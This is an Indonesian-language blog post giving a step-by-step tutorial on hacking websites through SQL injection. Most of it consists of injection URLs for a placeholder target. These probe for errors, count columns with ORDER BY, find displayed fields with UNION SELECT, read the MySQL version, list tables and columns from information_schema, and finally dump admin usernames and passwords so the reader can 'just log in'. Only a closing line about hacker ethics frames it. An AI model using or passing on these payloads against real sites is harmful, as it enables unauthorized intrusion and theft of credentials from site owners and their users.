Hack Web dengan metode SQL Injection - Agung Firdausi Blog

Hack Web dengan metode SQL Injection


Punya impian bisa hack suatu web ? kira-kira bisa tercapai gak ya..?
Jawabannya bisa karena semua orang bisa melakukan apapun asal berusaha seperti menghack sebuah web, menghack sebuah web bisa dilakukan dengan berbagai cara misalnya salah satunya dengan metode SQL injection

Kira-kira apa SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke program atau kode script tersebut.
mungkin rasanya belum lengkap jika tidak mencoba sendiri, dibawah ini adalah langkah-langkah untuk menginjeksi suatu web.




Berikut langkah-langkahnya :

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...
---------------------------------------------------

Hacking adalah seni bukan kejahatan jadi gunakanlah Etika Seorang Hacker
Previous
Next Post »